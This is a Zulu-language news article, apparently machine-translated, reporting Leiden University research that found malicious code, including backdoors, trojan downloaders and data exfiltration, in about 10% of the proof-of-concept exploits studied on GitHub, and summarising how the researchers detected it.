Ikhodi enobungozi itholwe ngaphakathi kwama-xploits asingathwe ku-GitHub

Darkcrizt

Imizuzu ye-4

i-linux trojan

Indlela okwethulwa ngayo ikhodi enonya iyaqhubeka nokuvela ngokuthatha izindlela ezindala kanye nokwenza ngcono indlela abakhohliswa ngayo.

Kubukeka sengathi umbono wehhashi leThrojani usewusizo impela nanamuhla nangezindlela ezicashile kangangokuthi abaningi bethu banganakwa futhi abacwaningi bakamuva baseNyuvesi yaseLeiden (eNetherlands) ufunde inkinga yokushicilela ama-prototypes angelona iqiniso ku-GitHub.

Umqondo we sebenzisa lezi ukuze ukwazi ukuhlasela abasebenzisi abanolwazi abafuna ukuhlola nokufunda ukuthi obunye ubungozi bungasetshenziswa kanjani ngamathuluzi anikezwayo, kwenza lolu hlobo lwesimo lulungele ukwethulwa kwekhodi enonya ukuze kuhlaselwe abasebenzisi.

Kubikwa ukuthi ocwaningweni Kwahlaziywa ingqikithi yamaqoqo okuxhashazwa angu-47.313, ukumboza ubungozi obaziwayo obukhonjwe kusukela ngo-2017 kuya ku-2021. Ukuhlaziywa kokuxhaphaza kubonise ukuthi okungu-4893 (10,3%) kwakho kuqukethe ikhodi eyenza izenzo ezinonya.

Kungakho abasebenzisi abanquma ukusebenzisa izinto ezishicilelwe bayalulekwa ukuthi bazihlole kuqala ibheka okufakiwe okusolisayo futhi isebenzise ukuxhaphaza kuphela emishinini ebonakalayo ehlukanisiwe nesistimu enkulu.

Ubufakazi bomqondo (i-PoC) bezenzo zobungozi obaziwayo babiwa kabanzi emphakathini wezokuphepha. Basiza abahlaziyi bezokuphepha ukuthi bafunde komunye nomunye futhi benze uhlolo lokuphepha kanye nokubambisana kwenethiwekhi.

Eminyakeni embalwa edlule, sekudume kakhulu ukusabalalisa ama-PoCs ngokwesibonelo ngokusebenzisa amawebhusayithi nezinkundla, kanye nangezinqolobane zamakhodi omphakathi njenge-GitHub. Kodwa-ke, izinqolobane zamakhodi omphakathi azinikezi noma yisiphi isiqinisekiso sokuthi noma iyiphi i-PoC enikeziwe ivela emthonjeni othembekile noma ukuthi ivele yenza lokho okufanele ikwenze.

Kuleli phepha, siphenya ama-PoC abiwe ku-GitHub ngobungozi obaziwayo obutholwe ngo-2017–2021. Sithole ukuthi akuwona wonke ama-PoC athembekile.

Mayelana nenkinga izigaba ezimbili eziyinhloko zokuxhaphaza okunonya zikhonjiwe: Izehlakalo eziqukethe ikhodi enonya, isibonelo ukuvula isistimu ngemuva, ukulanda i-Trojan, noma ukuxhuma umshini ku-botnet, nokuxhaphaza okuqoqa nokuthumela ulwazi olubucayi mayelana nomsebenzisi.

Futhi, isigaba esihlukile sokuxhashazwa kwamanga okungenangozi nakho kwakhonjwa abangenzi izenzo ezimbi, kodwa futhi aziqukethe ukusebenza okulindelekile, isibonelo, yakhelwe ukukhohlisa noma ukuxwayisa abasebenzisi abasebenzisa ikhodi engaqinisekisiwe evela kunethiwekhi.

Obunye ubufakazi bomqondo buyimbumbulu (okungukuthi empeleni abanikezeli ngokusebenza kwe-PoC), noma
ngisho nokunonya: isibonelo, bazama ukukhipha idatha kusistimu abasebenzisa kuyo, noma bazame ukufaka uhlelo olungayilungele ikhompuyutha kuleyo sistimu.

Ukubhekana nalolu daba, siphakamise indlela yokuthola ukuthi i-PoC inonya yini. Indlela yethu isekelwe ekutholeni izimpawu esizibonile kusethi yedatha eqoqiwe, yazo
isibonelo, izingcingo eziya kumakheli e-IP ayingozi, ikhodi ebethelwe, noma okuhlanganisa okuhamba ngakubili kwe-trojanized.

Ngokusebenzisa le ndlela, sithole amakhosombe anonya angama-4893 kwangu-47313
amakhosombe alandiwe futhi aqinisekiswa (okungukuthi, u-10,3% wamakhosombe ahlolisisiwe akhona amakhodi anonya). Lesi sibalo sibonisa ukusabalala okukhathazayo kwama-PoC anonya ayingozi phakathi kwekhodi yokuxhaphaza esatshalaliswe ku-GitHub.

Ukuhlola okuhlukahlukene kwasetshenziswa ukuze kutholwe ukuxhashazwa okunonya:

  • Ikhodi yokuxhaphaza yahlaziywa ukuze kutholakale amakheli e-IP omphakathi anentambo, ngemva kwalokho amakheli akhonjiwe aphinde aqinisekiswa kusizindalwazi esivinjelwe sabasingathi esisetshenziselwa ukulawula ama-botnet nokusabalalisa amafayela anonya.
  • Ukuxhashazwa okuhlinzekwe ngefomu elihlanganisiwe kuhlolwe ngesofthiwe yokulwa namagciwane.
  • Ukuba khona kokulahlwa kwe-atypical hexadecimal noma ukufakwa ngefomethi ye-base64 kutholwe kukhodi, okwathi ngemva kwalokho okufakiwe kwaqoshwa futhi kwafundwa.

Kuyanconywa futhi kulabo basebenzisi abathanda ukwenza izivivinyo ngokwabo, bathathe imithombo efana ne-Exploit-DB phambili, njengoba lokhu kuzama ukuqinisekisa ukusebenza kahle nokuba semthethweni kwama-PoC. Njengoba, ngokuphambene, ikhodi yomphakathi ezisekelweni ezifana ne-GitHub ayinayo inqubo yokuqinisekisa ukuxhashazwa.

Okokugcina uma unentshisekelo yokwazi kabanzi ngakho, ungabheka imininingwane yocwaningo efayeleni elilandelayo, okuvela kulo Ngabelana ngesixhumanisi sakho.


Shiya umbono wakho

Ikheli lakho le ngeke ishicilelwe. Ezidingekayo ibhalwe nge *

*

*

  1. Unomthwalo wemfanelo ngedatha: AB Internet Networks 2008 SL
  2. Inhloso yedatha: Lawula Ugaxekile, ukuphathwa kwamazwana.
  3. Ukusemthethweni: Imvume yakho
  4. Ukuxhumana kwemininingwane: Imininingwane ngeke idluliselwe kubantu besithathu ngaphandle kwesibopho esisemthethweni.
  5. Isitoreji sedatha: Idatabase ebanjwe yi-Occentus Networks (EU)
  6. Amalungelo: Nganoma yisiphi isikhathi ungakhawulela, uthole futhi ususe imininingwane yakho.